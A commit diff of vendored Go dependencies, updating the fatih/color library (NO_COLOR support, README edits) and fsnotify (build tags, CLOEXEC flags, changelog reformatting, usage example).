#   source = "github.com/myfork/project2"
#
# [[override]]
#   name = "github.com/x/y"
#   version = "2.4.0"

[[constraint]]
  name = "github.com/mattn/go-colorable"
  version = "0.0.9"

[[constraint]]
  name = "github.com/mattn/go-isatty"
  version = "0.0.3"
29 vendor/github.com/fatih/color/README.md generated vendored
@ -1,14 +1,11 @@
# Color [](https://godoc.org/github.com/fatih/color) [](https://travis-ci.org/fatih/color)
# color [](https://github.com/fatih/color/actions) [](https://pkg.go.dev/github.com/fatih/color)

Color lets you use colorized outputs in terms of [ANSI Escape
Codes](http://en.wikipedia.org/wiki/ANSI_escape_code#Colors) in Go (Golang). It
has support for Windows too! The API can be used in several ways, pick one that
suits you.



## Install
@ -17,9 +14,6 @@ suits you.
go get github.com/fatih/color
```

Note that the `vendor` folder is here for stability. Remove the folder if you
already have the dependencies in your GOPATH.

## Examples

### Standard colors
@ -84,7 +78,7 @@ notice("Don't forget this...")
### Custom fprint functions (FprintFunc)

```go
blue := color.New(FgBlue).FprintfFunc()
blue := color.New(color.FgBlue).FprintfFunc()
blue(myWriter, "important notice: %s", stars)

// Mix up with multiple attributes
@ -133,14 +127,16 @@ fmt.Println("All text will now be bold magenta.")

There might be a case where you want to explicitly disable/enable color output. the
`go-isatty` package will automatically disable color output for non-tty output streams
(for example if the output were piped directly to `less`)
(for example if the output were piped directly to `less`).

`Color` has support to disable/enable colors both globally and for single color
definitions. For example suppose you have a CLI app and a `--no-color` bool flag. You
can easily disable the color output with:
The `color` package also disables color output if the [`NO_COLOR`](https://no-color.org) environment
variable is set (regardless of its value).

`Color` has support to disable/enable colors programatically both globally and
for single color definitions. For example suppose you have a CLI app and a
`--no-color` bool flag. You can easily disable the color output with:

```go

var flagNoColor = flag.Bool("no-color", false, "Disable color output")

if *flagNoColor {
@ -162,6 +158,10 @@ c.EnableColor()
c.Println("This prints again cyan...")
```

## GitHub Actions

To output color in GitHub Actions (or other CI systems that support ANSI colors), make sure to set `color.NoColor = false` so that it bypasses the check for non-tty output streams.

## Todo

* Save/Return previous values
@ -176,4 +176,3 @@ c.Println("This prints again cyan...")
## License

The MIT License (MIT) - see [`LICENSE.md`](https://github.com/fatih/color/blob/master/LICENSE.md) for more details
25 vendor/github.com/fatih/color/color.go generated vendored
@ -15,9 +15,11 @@ import (
var (
    // NoColor defines if the output is colorized or not. It's dynamically set to
    // false or true based on the stdout's file descriptor referring to a terminal
    // or not. This is a global option and affects all colors. For more control
    // over each color block use the methods DisableColor() individually.
    NoColor = os.Getenv("TERM") == "dumb" ||
    // or not. It's also set to true if the NO_COLOR environment variable is
    // set (regardless of its value). This is a global option and affects all
    // colors. For more control over each color block use the methods
    // DisableColor() individually.
    NoColor = noColorExists() || os.Getenv("TERM") == "dumb" ||
        (!isatty.IsTerminal(os.Stdout.Fd()) && !isatty.IsCygwinTerminal(os.Stdout.Fd()))

    // Output defines the standard output of the print functions. By default
@ -33,6 +35,12 @@ var (
    colorsCacheMu sync.Mutex // protects colorsCache
)

// noColorExists returns true if the environment variable NO_COLOR exists.
func noColorExists() bool {
    _, exists := os.LookupEnv("NO_COLOR")
    return exists
}

// Color defines a custom color object which is defined by SGR parameters.
type Color struct {
    params []Attribute
@ -108,7 +116,14 @@ const (

// New returns a newly created color object.
func New(value ...Attribute) *Color {
    c := &Color{params: make([]Attribute, 0)}
    c := &Color{
        params: make([]Attribute, 0),
    }

    if noColorExists() {
        c.noColor = boolPtr(true)
    }

    c.Add(value...)
    return c
}
@ -387,7 +402,7 @@ func (c *Color) EnableColor() {
}

func (c *Color) isNoColorSet() bool {
    // check first if we have user setted action
    // check first if we have user set action
    if c.noColor != nil {
        return *c.noColor
    }
2 vendor/github.com/fatih/color/doc.go generated vendored
@ -118,6 +118,8 @@ the color output with:
    color.NoColor = true // disables colorized output
}

You can also disable the color by setting the NO_COLOR environment variable to any value.

It also has support for single color definitions (local). You can
disable/enable color output on the fly:
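For context, a minimal sketch of the disable/enable behaviour the color.go and doc.go hunks above describe, using the library's public API (the flag name and messages are illustrative):

```go
package main

import (
    "flag"

    "github.com/fatih/color"
)

func main() {
    // Mirrors the README pattern: a --no-color flag disables output globally.
    // Setting NO_COLOR in the environment before the program starts has the
    // same effect, since the library checks it at package init.
    noColor := flag.Bool("no-color", false, "Disable color output")
    flag.Parse()

    if *noColor {
        color.NoColor = true // disables colorized output
    }

    color.New(color.FgCyan).Println("cyan when colors are enabled, plain otherwise")
}
```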
9 vendor/github.com/fsnotify/fsnotify/.editorconfig generated vendored
@ -1,5 +1,12 @@
root = true

[*]
[*.go]
indent_style = tab
indent_size = 4
insert_final_newline = true

[*.{yml,yaml}]
indent_style = space
indent_size = 2
insert_final_newline = true
trim_trailing_whitespace = true
1 vendor/github.com/fsnotify/fsnotify/.gitattributes generated vendored Normal file
@ -0,0 +1 @@
go.sum linguist-generated
2 vendor/github.com/fsnotify/fsnotify/.mailmap generated vendored Normal file
@ -0,0 +1,2 @@
Chris Howey <howeyc@gmail.com> <chris@howey.me>
Nathan Youngman <git@nathany.com> <4566+nathany@users.noreply.github.com>
30 vendor/github.com/fsnotify/fsnotify/.travis.yml generated vendored
@ -1,30 +0,0 @@
sudo: false
language: go

go:
  - 1.8.x
  - 1.9.x
  - tip

matrix:
  allow_failures:
    - go: tip
  fast_finish: true

before_script:
  - go get -u github.com/golang/lint/golint

script:
  - go test -v --race ./...

after_script:
  - test -z "$(gofmt -s -l -w . | tee /dev/stderr)"
  - test -z "$(golint ./... | tee /dev/stderr)"
  - go vet ./...

os:
  - linux
  - osx

notifications:
  email: false
16 vendor/github.com/fsnotify/fsnotify/AUTHORS generated vendored
@ -4,35 +4,44 @@

# You can update this list using the following command:
#
#     $ git shortlog -se | awk '{print $2 " " $3 " " $4}'
#     $ (head -n10 AUTHORS && git shortlog -se | sed -E 's/^\s+[0-9]+\t//') | tee AUTHORS

# Please keep the list sorted.

Aaron L <aaron@bettercoder.net>
Adrien Bustany <adrien@bustany.org>
Alexey Kazakov <alkazako@redhat.com>
Amit Krishnan <amit.krishnan@oracle.com>
Anmol Sethi <me@anmol.io>
Bjørn Erik Pedersen <bjorn.erik.pedersen@gmail.com>
Brian Goff <cpuguy83@gmail.com>
Bruno Bigras <bigras.bruno@gmail.com>
Caleb Spare <cespare@gmail.com>
Case Nelson <case@teammating.com>
Chris Howey <chris@howey.me> <howeyc@gmail.com>
Chris Howey <howeyc@gmail.com>
Christoffer Buchholz <christoffer.buchholz@gmail.com>
Daniel Wagner-Hall <dawagner@gmail.com>
Dave Cheney <dave@cheney.net>
Eric Lin <linxiulei@gmail.com>
Evan Phoenix <evan@fallingsnow.net>
Francisco Souza <f@souza.cc>
Gautam Dey <gautam.dey77@gmail.com>
Hari haran <hariharan.uno@gmail.com>
John C Barstow
Ichinose Shogo <shogo82148@gmail.com>
Johannes Ebke <johannes@ebke.org>
John C Barstow <jbowtie@amathaine.com>
Kelvin Fo <vmirage@gmail.com>
Ken-ichirou MATSUZAWA <chamas@h4.dion.ne.jp>
Matt Layher <mdlayher@gmail.com>
Matthias Stone <matthias@bellstone.ca>
Nathan Youngman <git@nathany.com>
Nickolai Zeldovich <nickolai@csail.mit.edu>
Oliver Bristow <evilumbrella+github@gmail.com>
Patrick <patrick@dropbox.com>
Paul Hammond <paul@paulhammond.org>
Pawel Knap <pawelknap88@gmail.com>
Pieter Droogendijk <pieter@binky.org.uk>
Pratik Shinde <pratikshinde320@gmail.com>
Pursuit92 <JoshChase@techpursuit.net>
Riku Voipio <riku.voipio@linaro.org>
Rob Figueiredo <robfig@gmail.com>
@ -41,6 +50,7 @@ Slawek Ligus <root@ooz.ie>
Soge Zhang <zhssoge@gmail.com>
Tiffany Jernigan <tiffany.jernigan@intel.com>
Tilak Sharma <tilaks@google.com>
Tobias Klauser <tobias.klauser@gmail.com>
Tom Payne <twpayne@gmail.com>
Travis Cline <travis.cline@gmail.com>
Tudor Golubenco <tudor.g@gmail.com>
116 vendor/github.com/fsnotify/fsnotify/CHANGELOG.md generated vendored
@ -1,6 +1,28 @@
# Changelog

## v1.4.7 / 2018-01-09
All notable changes to this project will be documented in this file.

The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).

## [Unreleased]

## [1.5.1] - 2021-08-24

* Revert Add AddRaw to not follow symlinks

## [1.5.0] - 2021-08-20

* Go: Increase minimum required version to Go 1.12 [#381](https://github.com/fsnotify/fsnotify/pull/381)
* Feature: Add AddRaw method which does not follow symlinks when adding a watch [#289](https://github.com/fsnotify/fsnotify/pull/298)
* Windows: Follow symlinks by default like on all other systems [#289](https://github.com/fsnotify/fsnotify/pull/289)
* CI: Use GitHub Actions for CI and cover go 1.12-1.17
  [#378](https://github.com/fsnotify/fsnotify/pull/378)
  [#381](https://github.com/fsnotify/fsnotify/pull/381)
  [#385](https://github.com/fsnotify/fsnotify/pull/385)
* Go 1.14+: Fix unsafe pointer conversion [#325](https://github.com/fsnotify/fsnotify/pull/325)

## [1.4.7] - 2018-01-09

* BSD/macOS: Fix possible deadlock on closing the watcher on kqueue (thanks @nhooyr and @glycerine)
* Tests: Fix missing verb on format string (thanks @rchiossi)
@ -10,62 +32,62 @@
* Linux: Properly handle inotify's IN_Q_OVERFLOW event (thanks @zeldovich)
* Docs: replace references to OS X with macOS

## v1.4.2 / 2016-10-10
## [1.4.2] - 2016-10-10

* Linux: use InotifyInit1 with IN_CLOEXEC to stop leaking a file descriptor to a child process when using fork/exec [#178](https://github.com/fsnotify/fsnotify/pull/178) (thanks @pattyshack)

## v1.4.1 / 2016-10-04
## [1.4.1] - 2016-10-04

* Fix flaky inotify stress test on Linux [#177](https://github.com/fsnotify/fsnotify/pull/177) (thanks @pattyshack)

## v1.4.0 / 2016-10-01
## [1.4.0] - 2016-10-01

* add a String() method to Event.Op [#165](https://github.com/fsnotify/fsnotify/pull/165) (thanks @oozie)

## v1.3.1 / 2016-06-28
## [1.3.1] - 2016-06-28

* Windows: fix for double backslash when watching the root of a drive [#151](https://github.com/fsnotify/fsnotify/issues/151) (thanks @brunoqc)

## v1.3.0 / 2016-04-19
## [1.3.0] - 2016-04-19

* Support linux/arm64 by [patching](https://go-review.googlesource.com/#/c/21971/) x/sys/unix and switching to to it from syscall (thanks @suihkulokki) [#135](https://github.com/fsnotify/fsnotify/pull/135)

## v1.2.10 / 2016-03-02
## [1.2.10] - 2016-03-02

* Fix golint errors in windows.go [#121](https://github.com/fsnotify/fsnotify/pull/121) (thanks @tiffanyfj)

## v1.2.9 / 2016-01-13
## [1.2.9] - 2016-01-13

kqueue: Fix logic for CREATE after REMOVE [#111](https://github.com/fsnotify/fsnotify/pull/111) (thanks @bep)

## v1.2.8 / 2015-12-17
## [1.2.8] - 2015-12-17

* kqueue: fix race condition in Close [#105](https://github.com/fsnotify/fsnotify/pull/105) (thanks @djui for reporting the issue and @ppknap for writing a failing test)
* inotify: fix race in test
* enable race detection for continuous integration (Linux, Mac, Windows)

## v1.2.5 / 2015-10-17
## [1.2.5] - 2015-10-17

* inotify: use epoll_create1 for arm64 support (requires Linux 2.6.27 or later) [#100](https://github.com/fsnotify/fsnotify/pull/100) (thanks @suihkulokki)
* inotify: fix path leaks [#73](https://github.com/fsnotify/fsnotify/pull/73) (thanks @chamaken)
* kqueue: watch for rename events on subdirectories [#83](https://github.com/fsnotify/fsnotify/pull/83) (thanks @guotie)
* kqueue: avoid infinite loops from symlinks cycles [#101](https://github.com/fsnotify/fsnotify/pull/101) (thanks @illicitonion)

## v1.2.1 / 2015-10-14
## [1.2.1] - 2015-10-14

* kqueue: don't watch named pipes [#98](https://github.com/fsnotify/fsnotify/pull/98) (thanks @evanphx)

## v1.2.0 / 2015-02-08
## [1.2.0] - 2015-02-08

* inotify: use epoll to wake up readEvents [#66](https://github.com/fsnotify/fsnotify/pull/66) (thanks @PieterD)
* inotify: closing watcher should now always shut down goroutine [#63](https://github.com/fsnotify/fsnotify/pull/63) (thanks @PieterD)
* kqueue: close kqueue after removing watches, fixes [#59](https://github.com/fsnotify/fsnotify/issues/59)

## v1.1.1 / 2015-02-05
## [1.1.1] - 2015-02-05

* inotify: Retry read on EINTR [#61](https://github.com/fsnotify/fsnotify/issues/61) (thanks @PieterD)

## v1.1.0 / 2014-12-12
## [1.1.0] - 2014-12-12

* kqueue: rework internals [#43](https://github.com/fsnotify/fsnotify/pull/43)
  * add low-level functions
@ -77,22 +99,22 @@ kqueue: Fix logic for CREATE after REMOVE [#111](https://github.com/fsnotify/fsn
* kqueue: fix regression in rework causing subdirectories to be watched [#48](https://github.com/fsnotify/fsnotify/issues/48)
* kqueue: cleanup internal watch before sending remove event [#51](https://github.com/fsnotify/fsnotify/issues/51)

## v1.0.4 / 2014-09-07
## [1.0.4] - 2014-09-07

* kqueue: add dragonfly to the build tags.
* Rename source code files, rearrange code so exported APIs are at the top.
* Add done channel to example code. [#37](https://github.com/fsnotify/fsnotify/pull/37) (thanks @chenyukang)

## v1.0.3 / 2014-08-19
## [1.0.3] - 2014-08-19

* [Fix] Windows MOVED_TO now translates to Create like on BSD and Linux. [#36](https://github.com/fsnotify/fsnotify/issues/36)

## v1.0.2 / 2014-08-17
## [1.0.2] - 2014-08-17

* [Fix] Missing create events on macOS. [#14](https://github.com/fsnotify/fsnotify/issues/14) (thanks @zhsso)
* [Fix] Make ./path and path equivalent. (thanks @zhsso)

## v1.0.0 / 2014-08-15
## [1.0.0] - 2014-08-15

* [API] Remove AddWatch on Windows, use Add.
* Improve documentation for exported identifiers. [#30](https://github.com/fsnotify/fsnotify/issues/30)
@ -146,51 +168,51 @@ kqueue: Fix logic for CREATE after REMOVE [#111](https://github.com/fsnotify/fsn
* no tests for the current implementation
* not fully implemented on Windows [#93](https://github.com/howeyc/fsnotify/issues/93#issuecomment-39285195)

## v0.9.3 / 2014-12-31
## [0.9.3] - 2014-12-31

* kqueue: cleanup internal watch before sending remove event [#51](https://github.com/fsnotify/fsnotify/issues/51)

## v0.9.2 / 2014-08-17
## [0.9.2] - 2014-08-17

* [Backport] Fix missing create events on macOS. [#14](https://github.com/fsnotify/fsnotify/issues/14) (thanks @zhsso)

## v0.9.1 / 2014-06-12
## [0.9.1] - 2014-06-12

* Fix data race on kevent buffer (thanks @tilaks) [#98](https://github.com/howeyc/fsnotify/pull/98)

## v0.9.0 / 2014-01-17
## [0.9.0] - 2014-01-17

* IsAttrib() for events that only concern a file's metadata [#79][] (thanks @abustany)
* [Fix] kqueue: fix deadlock [#77][] (thanks @cespare)
* [NOTICE] Development has moved to `code.google.com/p/go.exp/fsnotify` in preparation for inclusion in the Go standard library.

## v0.8.12 / 2013-11-13
## [0.8.12] - 2013-11-13

* [API] Remove FD_SET and friends from Linux adapter

## v0.8.11 / 2013-11-02
## [0.8.11] - 2013-11-02

* [Doc] Add Changelog [#72][] (thanks @nathany)
* [Doc] Spotlight and double modify events on macOS [#62][] (reported by @paulhammond)

## v0.8.10 / 2013-10-19
## [0.8.10] - 2013-10-19

* [Fix] kqueue: remove file watches when parent directory is removed [#71][] (reported by @mdwhatcott)
* [Fix] kqueue: race between Close and readEvents [#70][] (reported by @bernerdschaefer)
* [Doc] specify OS-specific limits in README (thanks @debrando)

## v0.8.9 / 2013-09-08
## [0.8.9] - 2013-09-08

* [Doc] Contributing (thanks @nathany)
* [Doc] update package path in example code [#63][] (thanks @paulhammond)
* [Doc] GoCI badge in README (Linux only) [#60][]
* [Doc] Cross-platform testing with Vagrant [#59][] (thanks @nathany)

## v0.8.8 / 2013-06-17
## [0.8.8] - 2013-06-17

* [Fix] Windows: handle `ERROR_MORE_DATA` on Windows [#49][] (thanks @jbowtie)

## v0.8.7 / 2013-06-03
## [0.8.7] - 2013-06-03

* [API] Make syscall flags internal
* [Fix] inotify: ignore event changes
@ -198,74 +220,74 @@ kqueue: Fix logic for CREATE after REMOVE [#111](https://github.com/fsnotify/fsn
* [Fix] tests on Windows
* lower case error messages

## v0.8.6 / 2013-05-23
## [0.8.6] - 2013-05-23

* kqueue: Use EVT_ONLY flag on Darwin
* [Doc] Update README with full example

## v0.8.5 / 2013-05-09
## [0.8.5] - 2013-05-09

* [Fix] inotify: allow monitoring of "broken" symlinks (thanks @tsg)

## v0.8.4 / 2013-04-07
## [0.8.4] - 2013-04-07

* [Fix] kqueue: watch all file events [#40][] (thanks @ChrisBuchholz)

## v0.8.3 / 2013-03-13
## [0.8.3] - 2013-03-13

* [Fix] inoitfy/kqueue memory leak [#36][] (reported by @nbkolchin)
* [Fix] kqueue: use fsnFlags for watching a directory [#33][] (reported by @nbkolchin)

## v0.8.2 / 2013-02-07
## [0.8.2] - 2013-02-07

* [Doc] add Authors
* [Fix] fix data races for map access [#29][] (thanks @fsouza)

## v0.8.1 / 2013-01-09
## [0.8.1] - 2013-01-09

* [Fix] Windows path separators
* [Doc] BSD License

## v0.8.0 / 2012-11-09
## [0.8.0] - 2012-11-09

* kqueue: directory watching improvements (thanks @vmirage)
* inotify: add `IN_MOVED_TO` [#25][] (requested by @cpisto)
* [Fix] kqueue: deleting watched directory [#24][] (reported by @jakerr)

## v0.7.4 / 2012-10-09
## [0.7.4] - 2012-10-09

* [Fix] inotify: fixes from https://codereview.appspot.com/5418045/ (ugorji)
* [Fix] kqueue: preserve watch flags when watching for delete [#21][] (reported by @robfig)
* [Fix] kqueue: watch the directory even if it isn't a new watch (thanks @robfig)
* [Fix] kqueue: modify after recreation of file

## v0.7.3 / 2012-09-27
## [0.7.3] - 2012-09-27

* [Fix] kqueue: watch with an existing folder inside the watched folder (thanks @vmirage)
* [Fix] kqueue: no longer get duplicate CREATE events

## v0.7.2 / 2012-09-01
## [0.7.2] - 2012-09-01

* kqueue: events for created directories

## v0.7.1 / 2012-07-14
## [0.7.1] - 2012-07-14

* [Fix] for renaming files

## v0.7.0 / 2012-07-02
## [0.7.0] - 2012-07-02

* [Feature] FSNotify flags
* [Fix] inotify: Added file name back to event path

## v0.6.0 / 2012-06-06
## [0.6.0] - 2012-06-06

* kqueue: watch files after directory created (thanks @tmc)

## v0.5.1 / 2012-05-22
## [0.5.1] - 2012-05-22

* [Fix] inotify: remove all watches before Close()

## v0.5.0 / 2012-05-03
## [0.5.0] - 2012-05-03

* [API] kqueue: return errors during watch instead of sending over channel
* kqueue: match symlink behavior on Linux
@ -273,22 +295,22 @@ kqueue: Fix logic for CREATE after REMOVE [#111](https://github.com/fsnotify/fsn
* [Fix] kqueue: handle EINTR (reported by @robfig)
* [Doc] Godoc example [#1][] (thanks @davecheney)

## v0.4.0 / 2012-03-30
## [0.4.0] - 2012-03-30

* Go 1 released: build with go tool
* [Feature] Windows support using winfsnotify
* Windows does not have attribute change notifications
  * Roll attribute notifications into IsModify

## v0.3.0 / 2012-02-19
## [0.3.0] - 2012-02-19

* kqueue: add files when watch directory

## v0.2.0 / 2011-12-30
## [0.2.0] - 2011-12-30

* update to latest Go weekly code

## v0.1.0 / 2011-10-19
## [0.1.0] - 2011-10-19

* kqueue: add watch on file creation to match inotify
* kqueue: create file event
2 vendor/github.com/fsnotify/fsnotify/LICENSE generated vendored
@ -1,5 +1,5 @@
Copyright (c) 2012 The Go Authors. All rights reserved.
Copyright (c) 2012 fsnotify Authors. All rights reserved.
Copyright (c) 2012-2019 fsnotify Authors. All rights reserved.

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
71 vendor/github.com/fsnotify/fsnotify/README.md generated vendored
@ -10,16 +10,16 @@ go get -u golang.org/x/sys/...

Cross platform: Windows, Linux, BSD and macOS.

|Adapter |OS |Status |
|----------|----------|----------|
|inotify |Linux 2.6.27 or later, Android\*|Supported [](https://travis-ci.org/fsnotify/fsnotify)|
|kqueue |BSD, macOS, iOS\*|Supported [](https://travis-ci.org/fsnotify/fsnotify)|
|ReadDirectoryChangesW|Windows|Supported [](https://ci.appveyor.com/project/NathanYoungman/fsnotify/branch/master)|
|FSEvents |macOS |[Planned](https://github.com/fsnotify/fsnotify/issues/11)|
|FEN |Solaris 11 |[In Progress](https://github.com/fsnotify/fsnotify/issues/12)|
|fanotify |Linux 2.6.37+ | |
|USN Journals |Windows |[Maybe](https://github.com/fsnotify/fsnotify/issues/53)|
|Polling |*All* |[Maybe](https://github.com/fsnotify/fsnotify/issues/9)|
| Adapter               | OS                               | Status                                                         |
| --------------------- | -------------------------------- | -------------------------------------------------------------- |
| inotify               | Linux 2.6.27 or later, Android\* | Supported                                                      |
| kqueue                | BSD, macOS, iOS\*                | Supported                                                      |
| ReadDirectoryChangesW | Windows                          | Supported                                                      |
| FSEvents              | macOS                            | [Planned](https://github.com/fsnotify/fsnotify/issues/11)      |
| FEN                   | Solaris 11                       | [In Progress](https://github.com/fsnotify/fsnotify/issues/12)  |
| fanotify              | Linux 2.6.37+                    | [Planned](https://github.com/fsnotify/fsnotify/issues/114)     |
| USN Journals          | Windows                          | [Maybe](https://github.com/fsnotify/fsnotify/issues/53)        |
| Polling               | *All*                            | [Maybe](https://github.com/fsnotify/fsnotify/issues/9)         |

\* Android and iOS are untested.

@ -33,6 +33,53 @@ All [releases](https://github.com/fsnotify/fsnotify/releases) are tagged based o

Go 1.6 supports dependencies located in the `vendor/` folder. Unless you are creating a library, it is recommended that you copy fsnotify into `vendor/github.com/fsnotify/fsnotify` within your project, and likewise for `golang.org/x/sys`.

## Usage

```go
package main

import (
    "log"

    "github.com/fsnotify/fsnotify"
)

func main() {
    watcher, err := fsnotify.NewWatcher()
    if err != nil {
        log.Fatal(err)
    }
    defer watcher.Close()

    done := make(chan bool)
    go func() {
        for {
            select {
            case event, ok := <-watcher.Events:
                if !ok {
                    return
                }
                log.Println("event:", event)
                if event.Op&fsnotify.Write == fsnotify.Write {
                    log.Println("modified file:", event.Name)
                }
            case err, ok := <-watcher.Errors:
                if !ok {
                    return
                }
                log.Println("error:", err)
            }
        }
    }()

    err = watcher.Add("/tmp/foo")
    if err != nil {
        log.Fatal(err)
    }
    <-done
}
```

## Contributing

Please refer to [CONTRIBUTING][] before opening an issue or pull request.
@ -65,6 +112,10 @@ There are OS-specific limits as to how many watches can be created:
* Linux: /proc/sys/fs/inotify/max_user_watches contains the limit, reaching this limit results in a "no space left on device" error.
* BSD / OSX: sysctl variables "kern.maxfiles" and "kern.maxfilesperproc", reaching these limits results in a "too many open files" error.

**Why don't notifications work with NFS filesystems or filesystem in userspace (FUSE)?**

fsnotify requires support from underlying OS to work. The current NFS protocol does not provide network level support for file notifications.

[#62]: https://github.com/howeyc/fsnotify/issues/62
[#18]: https://github.com/fsnotify/fsnotify/issues/18
[#11]: https://github.com/fsnotify/fsnotify/issues/11
1 vendor/github.com/fsnotify/fsnotify/fen.go generated vendored
@ -2,6 +2,7 @@
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.

//go:build solaris
// +build solaris

package fsnotify
5 vendor/github.com/fsnotify/fsnotify/fsnotify.go generated vendored
@ -2,6 +2,7 @@
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.

//go:build !plan9
// +build !plan9

// Package fsnotify provides a platform-independent interface for file system notifications.
@ -63,4 +64,6 @@ func (e Event) String() string {
}

// Common errors that can be reported by a watcher
var ErrEventOverflow = errors.New("fsnotify queue overflow")
var (
    ErrEventOverflow = errors.New("fsnotify queue overflow")
)
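The fsnotify.go hunk above only regroups the exported ErrEventOverflow into a var block; for context, a sketch of how a consumer might check for it on the watcher's error channel (illustrative, not from this commit):

```go
package main

import (
    "errors"
    "log"

    "github.com/fsnotify/fsnotify"
)

func main() {
    watcher, err := fsnotify.NewWatcher()
    if err != nil {
        log.Fatal(err)
    }
    defer watcher.Close()

    if err := watcher.Add("/tmp"); err != nil {
        log.Fatal(err)
    }

    for {
        select {
        case event := <-watcher.Events:
            log.Println("event:", event)
        case err := <-watcher.Errors:
            if errors.Is(err, fsnotify.ErrEventOverflow) {
                // The kernel event queue overflowed; some events were dropped.
                log.Println("overflow, consider rescanning the watched tree")
                continue
            }
            log.Println("watch error:", err)
        }
    }
}
```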
3 vendor/github.com/fsnotify/fsnotify/inotify.go generated vendored
@ -2,6 +2,7 @@
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.

//go:build linux
// +build linux

package fsnotify
@ -272,7 +273,7 @@ func (w *Watcher) readEvents() {

        if nameLen > 0 {
            // Point "bytes" at the first byte of the filename
            bytes := (*[unix.PathMax]byte)(unsafe.Pointer(&buf[offset+unix.SizeofInotifyEvent]))
            bytes := (*[unix.PathMax]byte)(unsafe.Pointer(&buf[offset+unix.SizeofInotifyEvent]))[:nameLen:nameLen]
            // The filename is padded with NULL bytes. TrimRight() gets rid of those.
            name += "/" + strings.TrimRight(string(bytes[0:nameLen]), "\000")
        }
5 vendor/github.com/fsnotify/fsnotify/inotify_poller.go generated vendored
@ -2,6 +2,7 @@
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.

//go:build linux
// +build linux

package fsnotify
@ -40,12 +41,12 @@ func newFdPoller(fd int) (*fdPoller, error) {
    poller.fd = fd

    // Create epoll fd
    poller.epfd, errno = unix.EpollCreate1(0)
    poller.epfd, errno = unix.EpollCreate1(unix.EPOLL_CLOEXEC)
    if poller.epfd == -1 {
        return nil, errno
    }
    // Create pipe; pipe[0] is the read end, pipe[1] the write end.
    errno = unix.Pipe2(poller.pipe[:], unix.O_NONBLOCK)
    errno = unix.Pipe2(poller.pipe[:], unix.O_NONBLOCK|unix.O_CLOEXEC)
    if errno != nil {
        return nil, errno
    }
1 vendor/github.com/fsnotify/fsnotify/kqueue.go generated vendored
@ -2,6 +2,7 @@
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.

//go:build freebsd || openbsd || netbsd || dragonfly || darwin
// +build freebsd openbsd netbsd dragonfly darwin

package fsnotify
3 vendor/github.com/fsnotify/fsnotify/open_mode_bsd.go generated vendored
@ -2,10 +2,11 @@
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.

//go:build freebsd || openbsd || netbsd || dragonfly
// +build freebsd openbsd netbsd dragonfly

package fsnotify

import "golang.org/x/sys/unix"

const openMode = unix.O_NONBLOCK | unix.O_RDONLY
const openMode = unix.O_NONBLOCK | unix.O_RDONLY | unix.O_CLOEXEC
Some files were not shown because too many files have changed in this diff.